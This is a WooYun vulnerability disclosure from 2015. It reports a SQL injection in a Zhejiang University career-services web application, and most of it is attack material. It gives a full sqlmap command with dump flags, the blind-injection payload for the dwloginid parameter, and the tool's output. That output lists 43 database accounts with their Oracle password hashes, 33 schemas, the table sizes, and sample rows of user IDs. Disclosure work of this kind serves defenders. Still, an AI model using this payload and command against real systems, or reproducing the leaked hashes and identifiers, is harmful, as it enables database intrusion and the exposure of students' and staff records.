当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154710

漏洞标题:浙江大学就业指导与服务中心某处存在SQL注射漏洞(DBA权限/43名系统管理员密码泄露/33个库/245万ID信息泄露/92万日志信息泄露)

相关厂商:浙江大学

漏洞作者: 路人甲

提交时间:2015-11-22 10:40

修复时间:2015-11-27 10:42

公开时间:2015-11-27 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-22: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

浙江大学就业指导与服务中心某处存在SQL注射漏洞(DBA权限/43名系统管理员密码泄露/33个库/245万ID信息泄露/92万日志信息泄露)

详细说明:

地址:http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE

python sqlmap.py -u "http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE" -p dwloginid --technique=B --random-agent --batch --current-user --is-dba --users --passwords -D EJOB -T WJDC_WJHDB -C DRNF,PLSX,STID,TXNR,WJID,XXID,YHID --dump --start 1 --stop 10


back-end DBMS: Oracle
Database: EJOB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WJDC_WJHDB | 2453668 |
| XT_ZDLOG | 923276 |


漏洞证明:

---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'EJOB'
current user is DBA: True
database management system users [43]:
[*] ADMISSION
[*] ANONYMOUS
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] MGMT_VIEW
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SEARCH
[*] SHARE1010
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSTD
[*] ZABBIX
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZJUSEARCH
[*] ZUSS
[*] ZXGL
database management system users password hashes:
[*] ADMISSION [1]:
password hash: 9576C4AF4F314090
[*] ANONYMOUS [1]:
password hash: anonymous
[*] BOOK985211 [1]:
password hash: 35B32F7CB49869E1
[*] BWCMIS [1]:
password hash: 3C915384B5DE27C9
[*] CMS [1]:
password hash: 21888B15738276A5
[*] CTXSYS [1]:
password hash: 24ABAB8B06281B4C
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] DNT [1]:
password hash: B96A665A672DF17E
[*] EJOB [1]:
password hash: 184B5FD05A261CE4
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] IRDP [1]:
password hash: 7B842C52ACD30787
[*] IRDP_SJTB [1]:
password hash: 3886DF4B6E7F52D3
[*] KLGB [1]:
password hash: 3E9571A6D1901919
[*] KLGB_USER [1]:
password hash: 3FCA1F5D76FD61D2
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
password hash: 5449705B65AA80C1
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] RWSK [1]:
password hash: DD74726A0654D550
[*] RWSKDBA [1]:
password hash: 4E36415ED0B1F7AD
[*] SEARCH [1]:
password hash: 5E46E91399F31935
[*] SHARE1010 [1]:
password hash: C0BC1D5DB5A8A848
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
password hash: 75800913E1B66343
[*] SYSMAN [1]:
password hash: 447B729161192C24
[*] SYSTEM [1]:
password hash: F60464F7C3324170
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
[*] XSTD [1]:
password hash: FA5A38495BE751EE
[*] ZABBIX [1]:
password hash: 917FF6AAC3AD8ABB
[*] ZD_GJJY [1]:
password hash: 62CCCD604CBEEB83
[*] ZDQK [1]:
password hash: EF4EF71B6469DF34
[*] ZDWEB [1]:
password hash: 9F41AAD997C24D7E
[*] ZFMH [1]:
password hash: AC679BFBC9727906
[*] ZFSMP [1]:
password hash: 4FBCB2BD281A6653
[*] ZJUPAS [1]:
password hash: 43886DBC3C13ED61
[*] ZJUSEARCH [1]:
password hash: 84F958A512659E2A
[*] ZUSS [1]:
password hash: B864134D33CB3A73
[*] ZXGL [1]:
password hash: E7737492D8EA1F8E
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
available databases [33]:
[*] ADMISSION
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SHARE1010
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZUSS
[*] ZXGL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'EJOB'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| WJDC_WJHDB | 2453668 |
| XT_ZDLOG | 923276 |
| ZD_DA_XSDAQDB | 316790 |
| WJDC_WJDJRB | 303219 |
| ZD_SYXXB | 93367 |
| ZD_XYXXB | 86233 |
| ZD_SYXXB_TMP_TEST1 | 85246 |
| ZD_JYXXB | 82053 |
| ZD_BDZHB | 71392 |
| ZD_BDZHB_TMP_TEST1 | 59513 |
| ZD_BDXXB | 55306 |
| ZD_JYXGJLB | 52414 |
| ZD_DAXXB | 41727 |
| ZD_DAXXB_TMP_TEST1 | 41727 |
| ZD_SYXGJLB | 34733 |
| ZDWZ_ZPXXB | 29324 |
| ZDWZ_ZPHCDYDB | 25073 |
| ZDWZ_DWZPB | 21816 |
| WJDC_DJR_XSK | 21403 |
| ZD_DWXXB | 21140 |
| ZD_XYSHB | 20261 |
| ZD_BMQTXXB | 16885 |
| BAK_ZDWZ_ZPXXB | 16747 |
| ZDWZ_ZWTJB | 16719 |
| ZDWZ_DWZCB | 16419 |
| ZD_BMXXB | 15190 |
| ZXQY_QYXXB | 13573 |
| WJDC_DJR_XSK_TMP_TEST1 | 12103 |
| TEST_ZD_SYXXB | 11997 |
| ZD_BDZHB_TMP2_TEST1 | 11879 |
| ZD_BMGRXXB | 11620 |
| WJDC_DJR_XSK_TMP2_TEST1 | 10621 |
| ZD_TJXXB | 9478 |
| DMK_CODELIST | 9258 |
| ZD_MYXXB | 9231 |
| ZD_MYXXB_TMP_TEST1 | 8323 |
| WJDC_XYWJFSB | 8210 |
| ZD_XY_ZY | 8088 |
| XT_USERPURVIEW | 7844 |
| ZXQY_QYDWB | 7789 |
| ZDWZ_ZPHSQB | 6599 |
| YAN_ZD_SYXXB | 6554 |
| TEMP_ZD_SYXXB | 6234 |
| BEN_ZD_SYXXB | 6150 |
| ZD_SYXGSQB | 4924 |
| WJDC_STK_XXB | 4336 |
| WJDC_DJR_XYK | 4109 |
| JC_AREA_TEMP | 3839 |
| ZDWZ_ZCZPHXXB | 3700 |
| DMK_CODELIST_TMP2_TEST1 | 3524 |
| JC_AREA | 3491 |
| ZDWZ_CDSQB | 3274 |
| ZD_WYXXB | 2995 |
| DMK_XX | 2981 |
| WJDC_DJR_XYK_TMP2_TEST1 | 2854 |
| ZDWZ_ZCQTXXB | 2735 |
| DMK_CODELIST_TMP_TEST1 | 2450 |
| ZD_XYXXSZB | 2173 |
| TMP_DWXXB | 2148 |
| ZD_ZY | 2074 |
| ZD_ZY_TEST | 2002 |
| ZDWZ_CDSQB_BAK | 1769 |
| YW_STUINFOMODIFY | 1734 |
| YW_STUDENTINFO | 1732 |
| JC_ZHUANYE | 1537 |
| ZD_XYSH_NEW | 1493 |
| WJDC_WJXXXXB | 1461 |
| ZDWZ_ZPTMP | 1445 |
| ZD_TJB | 1389 |
| WJDC_DJR_XYK_TMP_TEST1 | 1257 |
| ZD_XYSH_OLD | 1129 |
| ZDWZ_CDSQSFXMB | 1095 |
| TEMP_MYXSB | 1032 |
| TEST_ZD_XY_ZY | 988 |
| JC_GVLIST | 967 |
| ZD_BMZDPZB | 930 |
| ZD_DAB | 881 |
| ZD_DAB_TMP_TEST1 | 875 |
| WJDC_STK | 838 |
| ZDWZ_CDSQSFXMB_BAK | 671 |
| ZD_SJSBB_JSH | 664 |
| ZD_SY_ZY | 662 |
| ZD_SYXXB_TMP2_TEST1 | 474 |
| TEST | 469 |
| BAK_SYSXXB | 393 |
| ZD_DWSSJTB | 373 |
| ZDWZ_ZWLB_MC | 373 |
| JC_CITY | 348 |
| ZDWZ_ZWMCB | 336 |
| XT_ROLETOMODEL | 302 |
| PRINTPAGE | 220 |
| XT_ADMINUSER | 215 |
| ZD_BMXMB | 196 |
| ZD_WJGLB | 171 |
| ZD_XYSYSB | 160 |
| ZDWZ_ZCLXRB | 160 |
| JC_SCHOOL | 137 |
| ZD_BDZGPYSB | 124 |
| XT_SUBMODEL | 87 |
| ZD_MYXXB_TMP2_TEST1 | 86 |
| JC_GVLISTTEMP | 76 |
| XT_SUBMODELTEMP | 74 |
| NEWSCONTENT | 69 |
| ZDWZ_ZPHXXB | 65 |
| ZDWZ_ZPHCDB | 59 |
| ZDWZ_CDSFXMGXB | 58 |
| WJDC_WJSTDLB | 57 |
| DMK_TYPELIST | 53 |
| TEST_ZD_JYXXB | 51 |
| ZD_DA_DAQDB | 51 |
| WJDC_JCDMK | 49 |
| ZDWZ_HYLBB | 46 |
| WJDC_WJJBXXB | 45 |
| ZD_DAXXB_TMP2_TEST1 | 45 |
| ZD_SJSBB | 43 |
| ZD_ZY_A | 42 |
| ZXQY_DWXZDMB | 40 |
| ZDWZ_ZWLBB | 38 |
| YW_CLASS | 36 |
| NEWS_TMP | 22 |
| XT_MODEL | 21 |
| YW_NEWS_COLUMN | 21 |
| ZD_YHDCZDB | 21 |
| JC_RESTYPE | 20 |
| ZDWZ_CDSFXMB | 20 |
| XT_ROLE | 18 |
| YW_STUINFOMODIFY_TEMP | 18 |
| YW_STUDENTINFO_TEMP | 14 |
| ZD_YHFKB | 14 |
| YW_STUDENTINFO_TMP_SYS | 13 |
| WJDC_WJLJB | 12 |
| ZD_ZNXWB | 11 |
| WJDC_STLXDMB | 9 |
| YW_COLLEGE_TEMP | 8 |
| YW_DATELIST | 8 |
| YW_SCHOOL_ZHUANYE | 8 |
| YW_AD | 7 |
| YW_CLASS_TEMP | 6 |
| YW_SCHOOL_ZHUANYE_TEMP | 6 |
| ZD_DAB_TMP2_TEST1 | 6 |
| ZD_YJMBB | 6 |
| ZD_YXYHB | 6 |
| WJDC_DZLJB | 5 |
| ZDWZ_CDYHQXB | 5 |
| JC_POSTTYPE | 4 |
| YW_AD_POSITION | 4 |
| YW_STUDENTINFOTEMP_TMP_XX | 4 |
| YW_STUJYJHBTMP | 4 |
| YW_WJDCB | 4 |
| YW_AD_PAGE | 3 |
| YW_STUDENTINFOTEMP_TEMP | 3 |
| JC_SCHOOLTEMP | 2 |
| JC_ZHUANYE_TEMP | 2 |
| JL_PRACTICE | 2 |
| YW_COLLEGE | 2 |
| YW_STUJYXG | 2 |
| YW_STUPLANMODIFY | 2 |
| YW_ZBMS | 2 |
| ZD_BDZYSCTJB | 2 |
| ZD_DCZDB | 2 |
| JL_MINORTRAINING | 1 |
| WJDC_CSSZB | 1 |
| XT_PARASETTING | 1 |
| YW_SJSZ | 1 |
| YW_STUJYJHB | 1 |
| YW_STUPLAN | 1 |
| YW_STUUSERINFO | 1 |
| ZD_CSSZB | 1 |
| ZD_SJSBB_CHECK | 1 |
| ZD_SYXXB_CHECK | 1 |
+---------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
Table: WJDC_WJHDB
[7 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| DRNF | VARCHAR2 |
| PLSX | VARCHAR2 |
| STID | VARCHAR2 |
| TXNR | VARCHAR2 |
| WJID | VARCHAR2 |
| XXID | VARCHAR2 |
| YHID | VARCHAR2 |
+--------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
Table: WJDC_WJHDB
[10 entries]
+------+------+------+------+------+------+------------+
| DRNF | PLSX | STID | TXNR | WJID | XXID | YHID |
+------+------+------+------+------+------+------------+
| 2011 | 1 | 154 | NULL | 16 | 746 | 3070601193 |
| 2011 | 0 | 152 | NULL | 16 | 729 | 3070601193 |
| 2011 | 1 | 151 | NULL | 16 | 724 | 3070601193 |
| 2011 | 2 | 130 | NULL | 16 | 646 | 3070601193 |
| 2011 | 0 | 125 | NULL | 16 | 625 | 3070601193 |
| 2011 | 0 | 156 | NULL | 16 | 754 | 20808001 |
| 2011 | 0 | 152 | NULL | 16 | 731 | 3070902120 |
| 2011 | 0 | 151 | NULL | 16 | 721 | 3070301015 |
| 2011 | 1 | 152 | NULL | 16 | 735 | 20903051 |
| 2011 | 2 | 130 | NULL | 16 | 646 | 20903031 |
+------+------+------+------+------+------+------------+


修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-27 10:42

厂商回复:

最新状态:

暂无


漏洞评价:

评价